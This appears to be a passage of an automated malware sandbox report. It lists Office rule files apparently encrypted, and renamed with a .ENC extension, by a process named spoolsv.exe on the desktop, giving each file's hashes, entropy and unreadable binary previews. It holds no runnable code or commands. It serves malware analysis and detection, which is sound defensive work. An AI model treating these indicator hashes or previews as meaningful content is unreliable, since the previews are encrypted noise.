                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.A.o..'q...q6X..km..>.W..._.{...B..o...#..N.s....G.Ag.%....`.....?.ogP.(t.....5....Ev.....56..3D...C..^.t`.t..>.....\..X.:....EOD.X.M.L.>k.`..NPJ.x5?+...........r~.R.k.......U.c....P...O.$...;.p...a...R.j)..LqaCM_Z.o..T...\O_.........}..U.b........ml.wg]H.....wz.0.......$..0.t..+..W...A._.......J...L.o2X.Y.dd....~6..B..EO.l.r.@...S...g..._9C..s...........,U._1..!.L.S....a.b...kc..+......+u..N..........,..6M^............>..>.GKD......k..J/..y...'...*...y....)...|..d..l_-9.`i.O..#...1j...,...../H.aq4.@ce..v..fAjbY=|.Z.I*..%..D.r.....xJ...]Eq!..."....GA...UW=....3.........m.c....n?P.u...R.3.P(.Bs..;L..?...)..\2..?.`...rb=..'.@r.a...v...e....&.Q'.Uxyz(...UTyb.o...fZ...._.]..hL.....4.../..~.....Rf.........@...)^Us.q]..._..g.d.uF..?p......E....5. Y.t..id...E...`.z...q..^........xY......T..#R.+.\,i%.....0.2(......D.EVIb`...3............X.'..pL...!N,"..6AS...#.....Ae.....xA..C.....t.....k,

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.860052839590315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+QJQ5jSfdX25An0qjTXEDo8D5nEt/LmXs2nRNiPhi5hnMwCpx98H6a:+QJ+4drn08TXEDo8D5E1L32nRNghi5qI
                                                                                                                                                                                                                                                      MD5:FA18C8F8A337F39E36D3072A4E083E04
                                                                                                                                                                                                                                                      SHA1:39FD970D34A8CC0FB1FB67779E63D4B8F2808A0B
                                                                                                                                                                                                                                                      SHA-256:C10B5667A91C9A1B836829F38562F5B80EF2DDF7EDD61471D7273774AC5C88EE
                                                                                                                                                                                                                                                      SHA-512:6C194C75C418D33DE77F1459DBA329A082EBAFF7C90AA4368B1D35D528ABE4415C908DDF7313E5CBE09987982BBDD2FB332D9C4A29E8EDF26A5F74AA34B40DA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.I..~P.5&.....1{z.BD..r..j6.c...4.p.........kOE.-T=....Tr...v.SG.]...DSG.?t...qJ.`}..]...W60.J.r<k.`].u...>.......*...0...t...........l`hB4....)b\.5w....?...@..)xjTUW....JJ.....K.;....[.+P1.^.M@.g....".M(.,....R.t.......t].........i"`..........b.O\...>!nH&.).t?....{`.+.-..r.l.!..:A.l.O.6....zO....i/A,.=]u.q.......zAj%p....WQ.....)..\.......3...nUz.X--\..E.\.r2O\j..eb..7....}.t.x.\Sd..ce.W.&.../.D<).O.OJ:TEY...}....C.:3yH-......O.-.66..(...#.~.E.....i..Y..Sv_...|-i....V.....PC.....|F.q.....D...N...b.....Z%.w..(.......P.I...?..X..KJ..I.....8...&S...^.yXm.<.B...d.g.J{...4M.{Wt*.7..a........|S..I\l....Z}m.8.f.....=...(....d6.c..}/..A'..........U....f..^S..E..#&:p(..v0't.lZ{.....9]..?..._.f..F.DVTp..(.....~...5.G..<..R.}..M..*w".(..].HDa.v.,....?)0.`4..T.....5.!.........j{L...k.;y5..I.. ;.D....j_.0...K........;et{.{.....Z..6.S/...5.....L&.}.$...........vZ..15...}5:.......02...C...,].... .Q..;.b'.8.`.\

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.839581195511155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+y4xDov7j0f+SCHFyqlxvVt+dIi64DwQz5cZzSX4SIR2JHnfi75:+y4Jy7j0mvlyqbvqd43Q+ZzSpIefit
                                                                                                                                                                                                                                                      MD5:FB96652DA5D0F2D1526ABEA10A7D1F00
                                                                                                                                                                                                                                                      SHA1:DD8B85C167BE054CC9C5E5CBC5656158A84D5884
                                                                                                                                                                                                                                                      SHA-256:B41C2F838C36F29F7D423B2B4AC940C52D474FA20EF2BA4C258F1FF635F8B5BA
                                                                                                                                                                                                                                                      SHA-512:F6CCCC32648F4AD880369FF6831FBC76E0373F768C7B6B37CCDDDC03754515399D31F68AB996365CFE2F575EF83F34868C03CCCB36DEC43E34EBF881A305F6E4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..H..#.?......4.M.....=j...%.)!.,..x..p+....,.4..y.aU..c...A$.G....I.^.M.9.....|...P.`.c.J]..[(f....U.uC..c..v../$'.....Jj.a..Nf.vd.......$.JU..^|...m..dp[...UO';P[..Hr.......L...(.!...d.."9..*.^..L{..PH.GE'V.V..V/>.b..../......*I...YX..kiM... N...d..=b...R.rAR..eH.{YXb.1%..3Ys.).A.l..q.m5.'.=..w.u.b..+O..Vf..?.....].F.X.Pb4?.3.w.........Ip.r..*.R2.........1~.)X....(.....;+....4f.c..>.yy....q':k.N9..%..........E<.I......$w.MW..wK8.....u.../5>.16.....6..XT.z..Z....}.....nKr....Ho....]&6...)..o-.:S......M d.X.*"..+Vk....90.x:.Y.?....|..x.......6...H}.....M...g.N..f"..N..R....,...J.7..x......5..*+..t........"L...B..?....V.K.q.df5...:d../.f.......IH...:(3......p.!/..B......%R..bC.>-..P...H.4.X%9..z..)..ie.<mY.,O`G.....|./.3....w.{.8q.$=...s.............^Q..).%.H.3........~..d..RFm........."b2..''/.v..k....j;Z....g=..z8+G.~...:.F.....1u....A.%...0G .U......s.Y.OMM=.........k.rCG.....G......r

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.871704512977723
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++BimURY1Z9bBLItkpcbm6UsMH9ijSkHbZ3aE1kn1QXDyRXd+vLL1O:++LZ5B86sm6zMd1k93CRYhO
                                                                                                                                                                                                                                                      MD5:4A7BE386940EF8B8FE80BDC8CB37E6DB
                                                                                                                                                                                                                                                      SHA1:C71D654D1FE49E0BF7C1550676972588CAAE25BE
                                                                                                                                                                                                                                                      SHA-256:6BBBB8B0D2FF09695216DEDEC594120F70CDAC8C1BC7D14E528620CD880163DA
                                                                                                                                                                                                                                                      SHA-512:6DADCC561DB082A6AAA0F7E4A8AD82D9B6219C288EDC2341A19F5B04F04519AEAE7AF999C9B6600EDCB11AA7D03E306063FFD7044C8AC950B05319B81B1D819B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.6.t.p(..G....>B.....;..2Po.....{.^c(zQ.......eWg.vJ..[([.IW.x.l#.!..J..j..9....2....3.1M.....O...........MG...y...FC..m..g,.u.,6".z(.d.."...Y./)a..Q......-.1.1....{..V...8inM.0.#..b..[...Z...;..E....5p... .r..Qb^.. ..z..%.$..q.q...*..o..;.!..+.~v...U. B.b..gS.....;....s.......N..+.]N.(..C.3.3.$A. .'..J..%.......^..y.8d..V ..s.m.....*F......../.2.&x.Z{.wr.......~.^nm...M.jy.8&_.~....P.r...aw7.R.K.b.L..F.+...*dK:........ B...;..C]..3..K".i..#........@.|`,8..\tv..@&.hl..cQ.....U.....9....N..K.Y[.....K....[@.....~d.!..s.....Wt.8......-..5...B.N...Y........[...[;1.K...^iP<...r.g.@......Tmv.2.......b......0cMy69.O.["4.\.9.L:S[..$..y.J....K.o.@Q3..$.%|..&.c%..7. ;...........Z.#b^.^XI.........V.|_.d.i7..s.V.%.j.=.I.....n...U..}....v./..|W.).{u..H<..2v.......i.r8.......B..x........._.....b..><=...\..p..f.....S...a....o7.;......9.LBw)8[_.e.=-..Q.5..X.]...9.0k+..$C..#)_..K..XL.A.Z}.R.,...Z..p.l.]e..2v

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.856680654031149
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2NIo853S6BxStkrv5nv2W8OSklrEVoThhTXz87pK0R3sEWjvgeqpXT8ez:+1VVVzmcv5v2WfSkOSzj8780h8ez
                                                                                                                                                                                                                                                      MD5:7B3134419710BD7EFBD62C8A95217DA6
                                                                                                                                                                                                                                                      SHA1:C0E6F07E2B5B058F3BA986EE816755106E45B163
                                                                                                                                                                                                                                                      SHA-256:C01333E35D58425EA0DD3BBF0B1A4F39FF7598017DE0F0794734FED28034E8B4
                                                                                                                                                                                                                                                      SHA-512:858DE29627CA3C309DD4A4BFE8D551D0435EEDCAA7C6BDCE291D94A4EAADE4B931B3291B5D00B8CD71551C6E69917352C7C447217C2269DFD2587D81D690BA5F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.>..@.......}...^.].>MV.. .(.n.=.........B..f^x......7.j..V.m.b..5...c:.n....\9...3.zF.".8...:.V.\.U@.....B...!uz.....o#.p.W.....( .~....@,....._.JE.M.....9.....N..C...I;.............BL.....w.&....3f.....xq..p.W....z..k...^....E..'3.k.........#.X.L..(x...E.5}*!...)gu1.T...../y...<...sV..f?...,.)X{.....C..*_...%Q.f.E..2^...}..._....)>..<-..z....1EQ~b.o.n..I.......i..."^.....,...k.3...eW.[.eg.Ehhk.-=.nz[\.y....P7(..i......).'....W/.........C7.o{....Eu.p..'...qf..A.mtn.{.lH.(...4...|}V.(K.5d...FV..E..Y......8O&..m.A..TO....T.F..%]...Re..6.2j>..d..A...DA.Z.k<........8R5.~P?A[...K...6..5.J......'..k}..E..qZ.....*.b...c.zY.]......*.]...t~.iN.l..:.c.$....A.w..l.A.W.,."..).....`V..?.X....C..H........]........2 ..5......'~..Qo.c.......5.>...2.%W......Cw..^....,...4j9...*3......D.v....q8.wj..pPZyh.c..._..(^.;.A{m.....{.6So.b{.&....qX.n..3.{?@.LE......H.o....Y.........}.G)......X8..|

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.86029044960537
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+vAQf9mo7oUFXM2PNEjnlb3cFyXiiWbltNrw4SXJQNIhQXgojStnSXORdmMx0+iy:+cokUF5WlbjWbltNkLJmMyvj+4ORdS+1
                                                                                                                                                                                                                                                      MD5:943F4BD8E5BA700FB171F3483B098E95
                                                                                                                                                                                                                                                      SHA1:1D3063EF6650D0F5D801182B7104AC9A402C8FDA
                                                                                                                                                                                                                                                      SHA-256:E12394127ABE45A300B968823C90E695CE67B1F87B45FB0D0BA7C191FC9C3536
                                                                                                                                                                                                                                                      SHA-512:20B578688BFE7248F2F91E87242B96AD3BF9040B757EF31B6AF3623F92565961944F1A79AE668A9FECD19FB09D014C44EAEAB0848A567D371E9C5AA893A2E40D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.P.:..5.K......(>.+6.Y.A2.}...9P...".B...S.'..U..d..C......q.-..~f.V....]o.H.}.A.c7H..Cr5|...%..1@.....z.#5a.g.. .$..l.%..F...`=.cE..[q....9(z..}..0B..L;..r.n@..8k.z=.............{.]v..1n.:M%pqL..,i..'u...}....08.lg!a...{Z...I.5.xA..{>kG..c0)0....^..y.S..qA.f.l.*p...#.!.~...(..|..0.....5...'...T...$u..e...U...9.~. ...AKY....X.....^...:...:.Y....o.J...d.N..}..n.*[.e.......{Q...Gz..s.....D\..5.P.v.7.....(0..>...P.?.....R......S.N..t....{G..i..!R...w..V.GP..._/u.o.....$.H.....gV..X...}...1z.(sg].c.O+YGT...0M.Y....&..(...[Y..V..!FQ_~.eG<...9.i.hh./.}S.j.....0.hAH..4.C..~x.R....G..6aS....mU..F.P.D..h..N.....b.J..7o...Z.....Z..iFl'G...v^..B0......2.......P.{.m..Y.|.$~tJ...Hd.....#.xp....<..o{/.'.pA(...!...N...l....*6A.;..,.x......k..}...2T1...v..#...8 ..hE &:I.....8..9.%(e.c.5..71ZcR..K....b.]\.c.r....~l..h..-!.$..V....Z.!9x..0._2.&.t.w.c.?....<.p....}.+....~.c.E...J.ku..F..t.'....{.@=..........W.Hz..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.842063523258023
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UP31hjSgw0txCUG14JqcYoUxN0jrte/UEcZ/utx3CRwQoew12oabRYSzlieI6On:+UPFdw0lG14JqcLYk8cZCIH51Jl9lc
                                                                                                                                                                                                                                                      MD5:C29DEB81480F2A3F608ED1793764B65B
                                                                                                                                                                                                                                                      SHA1:549E177844D1D0DB62D529755F1AC8A1E0BB0AD4
                                                                                                                                                                                                                                                      SHA-256:9BDDD31488C4F72F2B0EB49F128FA7D041FB91158C6FD26448799D8D1602636C
                                                                                                                                                                                                                                                      SHA-512:42CE67474B10B588BB6B41B6E82266F624158B0868DBAF9070566DB295CF85875964332AFB77F660DAFEE54328C21F8E514AC787FB0324710E52C9253B05C428
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.}.=C9t%..I,}...T..E"6.m.c5....u._..|...-..'.....k....j."D..;....+kY..h.e"o.AM.q..#$z.S...1.N.t.X...8%........,..\?.t..6 ...p...;...y.....W4$........;.|qmb.V".....S...sG4..o.p.[.UZO..u.._0..nx...n..&.........5W.@._D,....k.9..(.2.U2."..'.<.^s*.^/.nG..8.Z:]u.$u.h....*.{3...0.....`....:".0..h............`4..>A..EGP..T..-..t....R.u.n.,B.....e...Ugm.bSQ...jc..".9...&R... P.-^%.+.`.....EjO.#........0........2".;_........%....54KfT..=...x.....X.....AZ..Q.,2..AyM...v{...+.=.. ...:|...*.PM.kD.....pi.`.....$..sl.B\.31....5...Mj..*C|.R.CW]..US..k.M..I..&."B.. ..q. .w..[(q.~A.%..:.... .Ho_....V./D).`..C..e...(..@.*Y\.)....:Z...."....mM..m......GO.....1..WQ.....S....J.d.D..=.......z..M5A..o:K.r9f..e..u.o..U.z...`....2..<&.O.l.*>.).L..p..u.Y..3u...N.}),l.....#b.j.+6Wz...[RW...0..p.m`3u.oH.u......xG....E.x1...j.j...9..4..Q1.}..B.).}..rt~H82.S[....Gu.r[.......xY..w.m.f.e.b..a..M..%.#.?n..E..Vf..%.ow..YKz.~.z_c..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8737819180582775
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+8askf67nI52IEXycI+QbmK5Fy0zkheiriwx9yAbNsdSWxjCN1:+1JfL5no9WFBKeC9LSSui
                                                                                                                                                                                                                                                      MD5:FBC489AD6234E857718373771F7DADFD
                                                                                                                                                                                                                                                      SHA1:EA3A37320155CD5D6A525111A3C4B73C72BEF4CB
                                                                                                                                                                                                                                                      SHA-256:47F6D12BD47CE97D194AC03706F308726057F66C5BA575081654AEC650D345D2
                                                                                                                                                                                                                                                      SHA-512:E98C99D5FE7BFFF7B4BE87D3EC78751148A0904366B68690B99D620237E3A76019322BF3B4EC9427D10C3356BA9DA71EBADDABE53DF0A6C3C65792AEA748E1F1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....F.Y....C.{.....t...v..(.b=...d.J.{.5...}.%.{.^ t....Q...b.J...w..S.y%3..\..*..]........y0%6[.V.I37..S$4.....r{...bM.!......m:R..i.jt....e{.o.#.+....y.lf;.NR.....<...HK-....j.*...O.2+..&.H.j[R....rm..jA....v....U.D...&.g=..E../...+..N.J...:.U........6......b...[s.}.v.6(.Q9....&...x....X....d.. ~G5..[....?.CW8.a....l.......)d.........H&&p.....6...-Mu.Bv.7/. ....k......9.:.D..,X.y.qP8.m.a.q....<..J.a.:(..u.<.G.".E.%Puo......6...,..!JEQ........aE.a...... =.....?.CK.....,.x5...s|_.|B....^}.@QU....;....Y......R..Rt....3Rg,.#n.,z...s.:..a..T..m..!)y.......t..|:.H|.z.0......e..e1....=.a..../..f.?...]...='5.WK.$q."W.5...T.DtZ0.r.'.0.*...Q...Q.B..~&dY.Y0....\.GO{h.......cv........(.f.rY....1.....}.X.|$.*......a.g.'......Q.E.#%#.....W .......OWe.q.`$.6.L....i......X...!%!}..>..).O.4...5.;<.MOy...D........_..R.(....O.-...Z..+.S..$.U).=!y.....5. ..Z1...ULH.....G^.....0.'..<.m.2V.<ly...3WX..a....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.855360273877651
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+P3OPiOerS6+3OQpv7pNYzTRzODXIeCE025LkL0dIdHXvGriwiXVoN76kBPPs:+WP9erS6+3OQjNQRzOLIl8GL0d+HfFwe
                                                                                                                                                                                                                                                      MD5:28ACAEFE6FA5C32042B17B0C9C438274
                                                                                                                                                                                                                                                      SHA1:CD285067EAF9E0F0A09AC0B3D5B541225CFB7B2E
                                                                                                                                                                                                                                                      SHA-256:9D2C4CFC1E7E9BC775B8A29834FC568AF745013188EE92BC2985E68021F528CE
                                                                                                                                                                                                                                                      SHA-512:8A17B4350DB634BB1CBCA85924E358AADB7EED79B825A07B61D29C08AF9A5209A542D4D261559C8E9F337B759CAF6E7693248166BA00F501C7BD29C9A613A34F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.*...o CE...K...>....~>;....&^...W.r-.I....R.^...:F..xH.f.....4...-A..W...n..u7h...i..m.].2V^S;.HR..^...`0.Q.j8.>.:......TGN...j.?=7...@F.U...YL.n..t..V.e..q"v..K..!.9..M.....C..:.w$z.>...[....!.,..%.'...1.)J..{...3.oil..@.....'..........v..^.b.r...........,...yz1..GZo..W..{..R.%..$..}..a......I......@.cm.\...r.Ar/rW.}....$....4p.C.....VOb.u...*...8S...:........S`..$.4q.,.(3.m.:r...z....G.....u..b....n..8..a.$:..._.X.7D....r...J..R.8.{..)=.."n@.u........>-.)%......-.O..8..&..3.S..'.C.......w*..9'nE.L..,e.^k..[6D*.....F.!..;._ ......i\..d.V..>.....5...1.!n-Fy..&`Qw.q...A..:K..4.......hp...P.r'..*..\.]59..'...C.2.D.?'...Pn....E\o..Zk.VU<.9!.'..Z.F.gL..|...\v=..:p..i.r....}..;lO.".A...._w.P.R..}....S..X.?.h...=.F.!T.....X$UY..^3q.....Q.E4..$...p.....8...`........&..%..`JV.!!s.<.7...K..y.%F..xi.z=.\.+.9.....q...g..%....j......\*'..._.g_.&...*A..f.H.`B.q,....3...........n......@....v.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.837868572071669
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+eoZbijDitwvIMnvsEK7FJvuXpDFQ8r86jHNXM41Iri/FRYzZolWr2uCl9fSabiO:+Z4Drnvkgh+8rHtPNYzGu2D9t2NEN
                                                                                                                                                                                                                                                      MD5:B3D908DF584032D9F90A191631EAD262
                                                                                                                                                                                                                                                      SHA1:C8D79E1F4AAC6148C2427AA55275411E0AB92B52
                                                                                                                                                                                                                                                      SHA-256:06124FCD6003B9A65803CB657A06F2550E3870644D650B8AF695BBD470718D47
                                                                                                                                                                                                                                                      SHA-512:A994BA7E1ABDCD51F883B222A567DEAD412765C50B2E58F3DFD30ED5CFAC701EF3310BA8EE69A80DD91AA34F2C1C51AAFEAC9DC3A3D525F4312AD4D34691BF52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..A..Ks/k<..L........-u..U(.4...S........&F.y.>.T..,%..V.B....(DD".-.i......b..=.....C.....x.}....N..,..0.L.R..E....-...]...$1C..`8z.V..,...l...... .C.e..t...5r....f.d......E.^.....w.....h....7..Wh.%T..O.S...o..p.Mxy3......Q./...........>?.<.NI.;sh....15.`e:.XM..q........ek..+t8...{....\.xoZ=>.........;....y..Nf:h.8K...,..O...T?j$\.U.Y.Lc^..^$w..^..R.........f4....>y.y.....,D......A,I.Lw.........J.._.y)........b..^..W......@.2..../..!9...n.0?...-.p.O4|.v..n..tZ...&*..;.G~.v...'.s.`;j&Q..I....N`..g...;.....A...K`Q.F.W.%..T;8J`Z...k3k..........."..i..Q.Kf......).u....^.N...Bft.B.$.....Z..}...6.........C@P/.......u.i......xQ......l.h.+..`.{Q.u.|..k.=3v;bd....".I.*..D.....|...l...;....`.S.u.yV.L..9....6...C.,*9D.."...#?N......O.9..c..VQ..4.B..f.,..i.g...P.s..=..=...s..G.U...Q.&..&.c7.lB.. .m.`N.&J-....9gs.`z.;...>..x......-5....R.....Z.-`3]X.6'.q_kw.)..Q6.."...c~..Me....>..X[...|f....(.K..M....a

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.86427704918799
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+CK9NkuEVx8bwNllvqeHBrErAwiqnxkz9yChkocq7v7h9WGK/PjNuNjJj:+3gx8bwNC8qP+NhlkGK/PZSd
                                                                                                                                                                                                                                                      MD5:D9F76893574A4ECBE593D8C33F949443
                                                                                                                                                                                                                                                      SHA1:0F25E75905F339D67DB93352832171BBB1F17D8C
                                                                                                                                                                                                                                                      SHA-256:23AA8C4F6C184BB58ADB7B4FCD23D3E9FAA62240383D12BB99D311B75C4BFB6F
                                                                                                                                                                                                                                                      SHA-512:78309543EC6F6C999CFAB4A54EE477DEB84457230E56483AF9554BE8F5ACBCF0CFDD6B132556CE9E1AB9DF217470CF17577DD502963497DF4DF9D5D41107BF29
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......J..~..!..;:....#..".ba..F=.c.......E..n..c.rQ..EJw..(5.o..~..28)...]P.)l|9Lb.......<..Xb..nk..J./.w..$..>...:z....9..:.O2..u..A.C.W....z........."....e...q.^V.M3r./.6P.O..L>#...)Z ..e-..4.;.I6ay....Z[..(.,....P,.......~.v...F.i..`..".SY.8.D...N`#. ....:..R+m..1w'........S.. ...1....HO..Nhv.?(.....+..B.......D......".e.....e....$.*.jlM. P..i=..e...j.....G.+n.{./I\.um.U.e....8...O*.....m.s..,.......N.RJer....\._.(C ..tKu....)D.....4.Y.A.+j...D...U.;.}..9;!. ...l<H/.(..T .CM....1?.n.$t.F....M..(V.......Q...Vq.K..s.A...nb;'..3.1.3.b.>.`.......}.....o.3...R....R..w.Z^...3eH..Dy..-CR.p!~...U.....E.4.Y..Y.E.*...K;..:u..i....Q1...!..)..^.......X......U.=,........E.B.......~.=..J.a...R9<|_.....W.&.1=....I|L.&V[..3`..i4(.#..g..._....rH...KVb~.K..r....G.>...........}..;..P.u{.2./l&x.9.1.4`0..=....(c!s.+Ov.g.z.L...s,......fd...}.=...wO.X....J..Ei}.-.......j..S.....&.k.TC~C8.bg..2.,5...?..>.F...W.CjN...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.866359893567411
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+RNlMooZdU4ig0fyJqJ8myVzdmfYsBUPyR3/PnnwlyzQJi/M+Xs9++/JTwVIs:+rocPq4OmyRdqRXQykJi/7yLWIs
                                                                                                                                                                                                                                                      MD5:D6B6860E80FB03944329E818AD85F4E6
                                                                                                                                                                                                                                                      SHA1:DD1F38466B92F9FB846AF6A600261D7D22BC4921
                                                                                                                                                                                                                                                      SHA-256:570ACB58BAD0326EA355971A1C83867ECA2B71BC3BBB8374FE417314D937FC6F
                                                                                                                                                                                                                                                      SHA-512:D4D916143BD26B4AC58858F333621D018989857C5594D10509ADF71C94F3501D183ACD33F1FDF2C32A8809D170F36F619EDF0DAB930D5436A3BBD2271D152785
                                                                                                                                                                                                                                                      Malicious:false
